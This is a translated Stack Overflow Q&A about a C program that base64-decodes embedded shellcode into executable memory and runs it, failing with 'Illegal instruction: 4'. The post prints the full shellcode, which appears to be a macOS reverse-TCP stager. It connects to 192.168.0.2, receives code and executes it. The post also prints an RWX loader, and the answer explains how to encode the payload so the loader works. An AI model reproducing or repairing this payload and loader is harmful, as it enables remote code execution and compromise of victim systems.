c - 解码后的shellcode不执行: Illegal instruction: 4

已关闭。这个问题是 not reproducible or was caused by typos 。目前不接受答案。

这个问题是由拼写错误或无法再重现的问题引起的。虽然类似的问题可能是 on-topic在这里，这个问题的解决方式不太可能帮助 future 的读者。

已关闭 4 年前。

我有一个c应用程序，它解码包含一些shellcode的base64字符串并尝试执行它，它似乎成功解码，但执行时出现错误Illegal instruction: 4发生。这是大部分代码:

unsigned char shellcode[] = "eDZheDAweDVmeDY4eDAweDEweDAweDAweDVleDZheDA3eDVheDY4eDAyeDEweDAweDAweDQxeDVheDZheDAweDQxeDU4eDZheDAweDQxeDU5eDY4eGM1eDAweDAweDAyeDU4eDBmeDA1eDBmeDgyeDc0eDAweDAweDAweDQ5eDg5eGM0eDZheDAweDQxeDVheDZheDBheDQxeDVieDZheDAyeDVmeDZheDAxeDVleDZheDAweDVheDY4eDYxeDAweDAweDAyeDU4eDBmeDA1eDcyeDMzeDQ4eDg5eGM3eDQ4eGI4eDAweDAyeDA0eGQzeGMweGE4eDAweDAyeDUweDU0eDVleDZheDEweDVheDY4eDYyeDAweDAweDAyeDU4eDBmeDA1eDcyeDE2eDRjeDg5eGU2eDY4eDAweDEweDAweDAweDVheDY4eDFkeDAweDAweDAyeDU4eDBmeDA1eDcyeDAzeDQxeGZmeGQ0eDQ5eGZmeGNieDc0eDFleDZheDAweDVmeDZheDAweDVleDZheDAweDVheDZheDAweDQxeDVheDZheDAweDZheDA1eDU0eDQxeDU4eDY4eDVkeDAweDAweDAyeDU4eDBmeDA1eGVieDk3eDY4eDAxeDAweDAweDAyeDU4eDZheDAxeDVmeDBmeDA1Cg==";
char buffer[4096];
int bufferLen = 4096;

int main() {

  base64decode(buffer, shellcode, sizeof(shellcode));
  printf("%s", buffer);

  void *ptr = mmap(NULL, bufferLen, (PROT_READ | PROT_WRITE | PROT_EXEC), (MAP_PRIVATE | MAP_ANONYMOUS), -1, 0);
  memcpy(ptr, buffer, bufferLen);

  int (*ret)() = (int(*)())ptr;
  ret();

}

原始 shellcode 是 \x6a\x00\x5f\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x68\x02\x10\x00\x00\x41\x5a\x6a\x00\x41\x58\x6a\x00\x41\x59\x68\xc5\x00\x00\x02\x58\x0f\x05\x0f\x82\x74\x00\x00\x00\x49\x89\xc4\x6a\x00\x41\x5a\x6a\x0a\x41\x5b\x6a\x02\x5f\x6a\x01\x5e\x6a\x00\x5a\x68\x61\x00\x00\x02\x58\x0f\x05\x72\x33\x48\x89\xc7\x48\xb8\x00\x02\x04\xd3\xc0\xa8\x00\x02\x50\x54\x5e\x6a\x10\x5a\x68\x62\x00\x00\x02\x58\x0f\x05\x72\x16\x4c\x89\xe6\x68\x00\x10\x00\x00\x5a\x68\x1d\x00\x00\x02\x58\x0f\x05\x72\x03\x41\xff\xd4\x49\xff\xcb\x74\x1e\x6a\x00\x5f\x6a\x00\x5e\x6a\x00\x5a\x6a\x00\x41\x5a\x6a\x00\x6a\x05\x54\x41\x58\x68\x5d\x00\x00\x02\x58\x0f\x05\xeb\x97\x68\x01\x00\x00\x02\x58\x6a\x01\x5f\x0f\x05 printf 语句返回正确的解码后的 shellcode，不带反斜杠，这可能是在解码过程中发生的，这可以解释错误，但如果我在编码之前在 shellcode 中放入双反斜杠，它会用一个反斜杠打印，表明这是 printf 命令删除它。这意味着 shellcode 完好无损，但仍然有错误。

我正在使用这里的base64解码函数:https://github.com/rapid7/metasploit-framework/blob/master/data/headers/windows/base64.h

最佳答案

问题出在编码字符串上。被编码的数据是人类可读的字符串。相反，您需要对原始二进制数据进行编码。

例如，您可以将数据放入文件中。您可以编写一个 C 问题来为您做到这一点。然后将文件导入 base64 作为输入(或直接从程序通过管道传输到 base64)。请记住，您的数据可能包含值为零的字节，因此您需要使用 fwrite 或 write 将其写出。

关于c - 解码后的shellcode不执行: Illegal instruction: 4，我们在Stack Overflow上找到一个类似的问题： https://stackoverflow.com/questions/56515920/

c - 解码后的shellcode不执行: Illegal instruction: 4

上一篇：javascript - 如何使用Brackets在搜索引擎上发布网站？

下一篇：c - 将字符串分配给指针变量时会发生什么？